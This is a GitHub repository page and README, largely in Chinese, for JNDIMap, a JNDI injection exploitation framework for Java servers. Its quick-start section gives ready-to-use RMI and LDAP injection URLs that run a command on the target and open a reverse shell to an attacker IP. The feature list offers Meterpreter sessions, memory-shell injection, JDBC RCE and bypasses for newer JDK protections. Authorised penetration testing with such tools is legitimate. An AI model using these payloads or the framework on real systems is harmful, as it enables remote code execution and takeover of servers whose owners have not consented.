Skip to content
/ JNDIMap Public

A powerful JNDI injection exploitation framework that supports RMI, LDAP and LDAPS protocols, including various bypass methods for high-version JDK restrictions

License

Notifications You must be signed in to change notification settings

X1r0z/JNDIMap

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

91 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

JNDIMap

GitHub Repo stars GitHub forks Static Badge GitHub Downloads (all assets, all releases) GitHub Release GitHub License

JNDIMap 是一个强大的 JNDI 注入利用框架, 支持 RMI、LDAP 和 LDAPS 协议, 包含多种高版本 JDK 绕过方式

简体中文 | English

🚀 快速上手

Release 页面下载 JNDIMap, 运行时传入 -i 参数指定外部 IP

java -jar JNDIMap-version.jar -i 10.0.0.1

在目标机器上执行命令或反弹 Shell

rmi://10.0.0.1:1099/Basic/Command/open -a Calculator
ldap://10.0.0.1:1389/Basic/ReverseShell/10.0.0.1/1337

🚩 功能特性

  • DNSLog
  • 命令执行
  • 反弹 Shell
  • Meterpreter 上线
  • 加载自定义 Java 字节码
  • 内存马注入 (基于 MemShellParty)
  • 高版本 JDK 绕过
    • BeanFactory 绕过 (Tomcat/Groovy/XStream, etc.)
    • JDBC RCE (MySQL/PostgreSQL/H2/Derby)
    • Tomcat Blind XXE
  • LDAP 反序列化 (包含常用 Gadget)
  • Nashorn JS 自定义 Payload

📖 使用指南

完整文档: USAGE.md

⚙️ 编译

Releases 的版本可能存在滞后, 推荐在使用时拉取源码自行编译 (基于 JDK 8)

git clone https://github.com/X1r0z/JNDIMap && cd JNDIMap
mvn package -Dmaven.test.skip=true

📷 参考 & 致谢

https://tttang.com/archive/1405/

https://paper.seebug.org/1832/

https://xz.aliyun.com/t/12846

http://www.lvyyevd.cn/archives/derby-shu-ju-ku-ru-he-shi-xian-rce

https://y4tacker.github.io/2023/03/20/year/2023/3/FastJson 与原生反序列化/

https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson 与原生反序列化-二/

https://www.yulegeyu.com/2022/11/12/Java 安全攻防之老版本 Fastjson 的一些不出网利用/

https://gv7.me/articles/2020/deserialization-of-serialvesionuid-conflicts-using-a-custom-classloader/

https://www.leavesongs.com/PENETRATION/use-tls-proxy-to-exploit-ldaps.html

https://exp10it.io/2025/03/h2-rce-in-jre-17/

https://forum.butian.net/share/4414

https://yzddmr6.com/posts/swinglazyvalue-in-webshell/

https://mogwailabs.de/en/blog/2024/12/jndi-mind-tricks/

🌟 Star History

Star History Chart

About

A powerful JNDI injection exploitation framework that supports RMI, LDAP and LDAPS protocols, including various bypass methods for high-version JDK restrictions

Topics

Resources

License

Stars

Watchers

Forks

Packages

No packages published